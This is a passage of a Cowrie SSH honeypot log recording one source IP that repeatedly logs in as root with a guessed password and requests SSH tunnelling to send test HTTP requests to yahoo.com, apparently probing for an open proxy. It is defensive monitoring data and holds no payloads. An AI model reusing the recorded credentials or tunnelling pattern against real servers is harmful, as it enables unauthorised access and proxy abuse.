57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:04:48.571815Z","src_ip":"213.209.150.239","session":"3ba3271f82c4"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:04:48.806730Z","src_ip":"213.209.150.239","session":"3ba3271f82c4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":3698,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:3698","sensor":"my-vps","timestamp":"2025-08-26T01:04:48.854783Z","session":"3ba3271f82c4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:48.902062Z","src_ip":"213.209.150.239","session":"3ba3271f82c4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":19384,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:19384","sensor":"my-vps","timestamp":"2025-08-26T01:04:49.037655Z","session":"3ba3271f82c4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:49.084799Z","src_ip":"213.209.150.239","session":"3ba3271f82c4"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:04:49.133351Z","src_ip":"213.209.150.239","session":"3ba3271f82c4"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":33383,"dst_ip":"1.2.3.4","dst_port":22,"session":"44e85f3a1f7a","protocol":"ssh","message":"New connection: 213.209.150.239:33383 (1.2.3.4:22) [session: 44e85f3a1f7a]","sensor":"my-vps","timestamp":"2025-08-26T01:04:49.188889Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:04:49.189649Z","src_ip":"213.209.150.239","session":"44e85f3a1f7a"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:04:49.246269Z","src_ip":"213.209.150.239","session":"44e85f3a1f7a"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:04:49.528144Z","src_ip":"213.209.150.239","session":"44e85f3a1f7a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":1202,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:1202","sensor":"my-vps","timestamp":"2025-08-26T01:04:49.586469Z","session":"44e85f3a1f7a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:49.643709Z","src_ip":"213.209.150.239","session":"44e85f3a1f7a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":4033,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:4033","sensor":"my-vps","timestamp":"2025-08-26T01:04:49.799044Z","session":"44e85f3a1f7a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:49.855821Z","src_ip":"213.209.150.239","session":"44e85f3a1f7a"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:04:49.913103Z","src_ip":"213.209.150.239","session":"44e85f3a1f7a"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":33436,"dst_ip":"1.2.3.4","dst_port":22,"session":"db412ed6972e","protocol":"ssh","message":"New connection: 213.209.150.239:33436 (1.2.3.4:22) [session: db412ed6972e]","sensor":"my-vps","timestamp":"2025-08-26T01:04:49.968869Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:04:49.969549Z","src_ip":"213.209.150.239","session":"db412ed6972e"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:04:50.026437Z","src_ip":"213.209.150.239","session":"db412ed6972e"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:04:50.309393Z","src_ip":"213.209.150.239","session":"db412ed6972e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":8263,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:8263","sensor":"my-vps","timestamp":"2025-08-26T01:04:50.367082Z","session":"db412ed6972e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:50.423991Z","src_ip":"213.209.150.239","session":"db412ed6972e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":7735,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:7735","sensor":"my-vps","timestamp":"2025-08-26T01:04:50.579376Z","session":"db412ed6972e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:50.636144Z","src_ip":"213.209.150.239","session":"db412ed6972e"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:04:50.693753Z","src_ip":"213.209.150.239","session":"db412ed6972e"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":33497,"dst_ip":"1.2.3.4","dst_port":22,"session":"c917871e1a25","protocol":"ssh","message":"New connection: 213.209.150.239:33497 (1.2.3.4:22) [session: c917871e1a25]","sensor":"my-vps","timestamp":"2025-08-26T01:04:50.739713Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:04:50.740797Z","src_ip":"213.209.150.239","session":"c917871e1a25"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:04:50.788087Z","src_ip":"213.209.150.239","session":"c917871e1a25"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:04:51.023302Z","src_ip":"213.209.150.239","session":"c917871e1a25"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":14179,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:14179","sensor":"my-vps","timestamp":"2025-08-26T01:04:51.071439Z","session":"c917871e1a25"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:51.118657Z","src_ip":"213.209.150.239","session":"c917871e1a25"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":24568,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:24568","sensor":"my-vps","timestamp":"2025-08-26T01:04:51.253771Z","session":"c917871e1a25"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:51.300899Z","src_ip":"213.209.150.239","session":"c917871e1a25"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:04:51.349203Z","src_ip":"213.209.150.239","session":"c917871e1a25"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":33553,"dst_ip":"1.2.3.4","dst_port":22,"session":"68cbb815c7c2","protocol":"ssh","message":"New connection: 213.209.150.239:33553 (1.2.3.4:22) [session: 68cbb815c7c2]","sensor":"my-vps","timestamp":"2025-08-26T01:04:51.395190Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:04:51.396016Z","src_ip":"213.209.150.239","session":"68cbb815c7c2"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:04:51.442898Z","src_ip":"213.209.150.239","session":"68cbb815c7c2"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:04:51.676994Z","src_ip":"213.209.150.239","session":"68cbb815c7c2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":25600,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:25600","sensor":"my-vps","timestamp":"2025-08-26T01:04:51.725075Z","session":"68cbb815c7c2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:51.772171Z","src_ip":"213.209.150.239","session":"68cbb815c7c2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":31214,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:31214","sensor":"my-vps","timestamp":"2025-08-26T01:04:51.909471Z","session":"68cbb815c7c2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:51.956478Z","src_ip":"213.209.150.239","session":"68cbb815c7c2"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:04:52.004332Z","src_ip":"213.209.150.239","session":"68cbb815c7c2"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":33607,"dst_ip":"1.2.3.4","dst_port":22,"session":"eb595a7f9fde","protocol":"ssh","message":"New connection: 213.209.150.239:33607 (1.2.3.4:22) [session: eb595a7f9fde]","sensor":"my-vps","timestamp":"2025-08-26T01:04:52.060266Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:04:52.061230Z","src_ip":"213.209.150.239","session":"eb595a7f9fde"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:04:52.117723Z","src_ip":"213.209.150.239","session":"eb595a7f9fde"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:04:52.399930Z","src_ip":"213.209.150.239","session":"eb595a7f9fde"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":1653,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:1653","sensor":"my-vps","timestamp":"2025-08-26T01:04:52.458868Z","session":"eb595a7f9fde"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:52.515723Z","src_ip":"213.209.150.239","session":"eb595a7f9fde"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":1089,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:1089","sensor":"my-vps","timestamp":"2025-08-26T01:04:52.671105Z","session":"eb595a7f9fde"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:52.727985Z","src_ip":"213.209.150.239","session":"eb595a7f9fde"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:04:52.785911Z","src_ip":"213.209.150.239","session":"eb595a7f9fde"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":33662,"dst_ip":"1.2.3.4","dst_port":22,"session":"60581b399fc4","protocol":"ssh","message":"New connection: 213.209.150.239:33662 (1.2.3.4:22) [session: 60581b399fc4]","sensor":"my-vps","timestamp":"2025-08-26T01:04:52.832242Z"}
